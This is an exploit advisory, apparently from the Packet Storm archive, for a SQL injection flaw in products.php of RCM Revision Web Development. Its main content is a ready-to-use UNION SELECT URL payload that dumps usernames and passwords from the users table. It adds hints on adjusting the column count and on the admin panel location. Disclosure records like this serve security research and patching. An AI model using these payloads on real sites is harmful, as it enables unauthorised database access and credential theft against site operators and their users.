RCM Revision Web Development suffers from a remote SQL injection vulnerability in products.php.
be7a31e6baf06eb2c5d863577af8bf9e0cb2890664bcb06caf30d8d3e531b060##########################################################
#
# RCM Revision Web Development (products.php) SQL Injection Vulnerability
#
# by D3m0n a.k.a Niiub
#
# Home: www.bl4ck-b0x.info
#
# niiub[at]bl4ck-b0x.info
#
##########################################################
##########################################################
Exploit:
products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
user_password),6%20from%20users/*
OR
/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
user_password),6%20from%20users/*
##########################################################
Note: There can by diffrent number of Table, you have to search.
Note2: The admin Panel is www.site.com/admin/ but i can't login with the
Password and Login name from the SQL Injection. :(
##########################################################
Greetz: dun - sid_psycho - Kacper - Str0ke
###########################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed